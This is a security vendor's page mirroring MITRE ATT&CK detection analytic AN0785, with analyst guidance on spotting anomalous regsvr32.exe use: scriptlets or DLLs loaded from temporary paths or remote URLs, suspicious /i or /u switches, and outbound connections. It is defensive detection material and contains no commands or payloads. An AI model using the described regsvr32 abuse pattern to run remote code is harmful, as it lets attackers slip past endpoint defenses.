Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0785: Analytic 0785

Detection focuses on identifying anomalous regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. Correlated sequences include regsvr32.exe process creation, module load of DLL/scriptlet, and optional outbound network traffic.

EnterpriseAN0785AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic matters because regsvr32.exe is a legitimate Windows utility, so suspicious use can blend into normal administration. The business decision value is whether the organization can distinguish expected system or admin activity from unusual executions that load scriptlets or DLLs from risky locations, use suspicious command-line switches, or initiate network connections.

Executive priority

Prioritize this as a Windows endpoint and SOC readiness validation item. Leaders should ask whether endpoint telemetry captures process creation, command-line arguments, module loads, file trust/signature context, and outbound network activity for regsvr32.exe. The main risk is not the tool itself, but blind spots that allow suspicious signed-binary activity to look like routine administration, weakening incident triage and audit evidence.

Technical view

For Windows environments, validate detections around anomalous regsvr32.exe execution. Focus on deviations from known administrative or system baselines: loading DLLs or scriptlets from unusual paths such as temporary directories, references to remote URLs, use of /i or /u with suspicious file references, outbound network connections by regsvr32.exe, and unsigned or untrusted DLL loads shortly after process start. Correlate process creation, command-line data, module load events, file path and signature metadata, and optional network telemetry.

Likely telemetry

  • Windows process creation events for regsvr32.exe
  • Full command-line arguments, including /i and /u usage
  • Module load telemetry for DLLs or scriptlets loaded after regsvr32.exe starts
  • File path metadata, especially temporary directories or unusual locations
  • Digital signature or trust information for loaded DLLs

Detection direction

  • Baseline legitimate administrative and system use of regsvr32.exe before tuning alerts.
  • Alert on regsvr32.exe loading content from unusual paths, temporary directories, or remote URLs where telemetry supports it.
  • Correlate process creation with subsequent DLL or scriptlet loads and any outbound network activity.
  • Tune for false positives from software installation, system administration, and application registration workflows.
  • Validate that telemetry preserves parent process, command line, loaded module, path, signature, and network context; missing fields will materially reduce analytic value.

Mitigation priorities

  • Ensure Windows endpoint logging captures process creation, command line, module load, file trust, and network connection context.
  • Restrict or monitor unnecessary regsvr32.exe usage where business operations allow.
  • Harden administrative workflows so expected regsvr32.exe activity is documented and distinguishable from anomalous use.
  • Use allowlisting or trust-based controls for DLL/scriptlet loading where feasible, without disrupting legitimate system registration tasks.
  • Include this behavior in incident response playbooks so analysts know how to collect process lineage, loaded modules, file provenance, and network evidence.
Analyst notes and limits

The supplied object is a detection analytic, not a technique entry, and no relationship context was supplied. The take is therefore centered on the official analytic description: anomalous regsvr32.exe execution on Windows, suspicious arguments, unusual load paths, remote references, untrusted DLLs, and correlated process/module/network sequences.

Official detection logic was not provided, tactics were not specified, and no related techniques, software, groups, mitigations, or data components were supplied. Local baselines and telemetry availability are required to determine alert thresholds, false positives, and operational coverage.

Official MITRE ATT&CK definition

Analytic 0785

Detection focuses on identifying anomalous regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. Correlated sequences include regsvr32.exe process creation, module load of DLL/scriptlet, and optional outbound network traffic.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
d3a6a57ba0377b5a...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle d3a6a57ba037…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0785
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use